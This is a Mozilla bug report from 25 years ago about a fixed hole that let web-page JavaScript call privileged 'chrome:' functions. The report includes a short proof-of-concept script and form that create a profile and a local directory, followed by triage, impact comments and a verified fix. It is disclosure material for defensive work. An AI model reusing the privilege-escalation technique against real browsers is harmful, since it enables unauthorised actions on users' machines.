Closed Bug 21144 Opened 25 years ago Closed 25 years ago

[DOGFOOD] Executing JS functions in "chrome:" protocol (creating local directories and profiles)

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Platform:
x86
Windows 95
Type:
defect

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

References

(
URL
)

Details

(Whiteboard: [PDT-]reviewed fix in hand) 

There is a vulnerability, which allows executing JavaScript functions in the
"chrome:" protocol.
This is dangerous because such functions have much more priviligies than
JavaScript functions loaded from a web page.
If one opens a "chrome:" url in a window, he have access to all functions in the
window and the functions are executed by "windowname.functionname()" in the
"chrome:" protocol.
Some of the predefined functions in the Mozilla chrome may do dangerous things.
This demonstration creates a profile named "georgi" and creates the directory
"c:\georgi".
The code is:
-------------------------------------------------------------------------
<SCRIPT>
b=window.open("","victim");
function g()
{
b.profile.createNewProfile("georgi","c:\\georgi\\");
}
setTimeout("document.forms[0].submit()",1000);
setTimeout("g()",4000);
</SCRIPT>
<FORM ACTION="chrome://profile/content/createProfileWizard.xul" TARGET="victim"
METHOD="POST">
</FORM>
-------------------------------------------------------------------------
Status: NEW → ASSIGNED
Summary: Executing JS functions in "chrome:" protocol (creating local directories and profiles) → [DOGFOOD] Executing JS functions in "chrome:" protocol (creating local directories and profiles)
Marking dogfood for PDT consideration.
Jim Roskind asked:
>Can you make some comments about this bug?  Can the content arrive from
>outside, or is it restricted to stuff on the local
>disk?  Is there any obvious attackable script sitting locally?

This bug allows access to all functions defined in chrome. This is the
equivalent of a Java applet being able to call all methods of all classes in the
system. We haven't reviewed the whole of the JavaScript defined in chrome since
the model is to prevent access to all of it, but I would be very suprised if
there weren't many opportunities for exploitation.
Whiteboard: reviewed fix in hand
Whiteboard: reviewed fix in hand → [PDT-]reviewed fix in hand
Target Milestone: M12
Putting on PDT- radar.  But it good for M12...please see chofmann for approval
to check in.
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Fixed:

Checking in nsFormFrame.cpp;
/m/pub/mozilla/layout/html/forms/src/nsFormFrame.cpp,v  <--  nsFormFrame.cpp
new
revision: 3.86; previous revision: 3.85
done
Status: RESOLVED → VERIFIED
Verified fixed.
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in before you can comment on or make changes to this bug.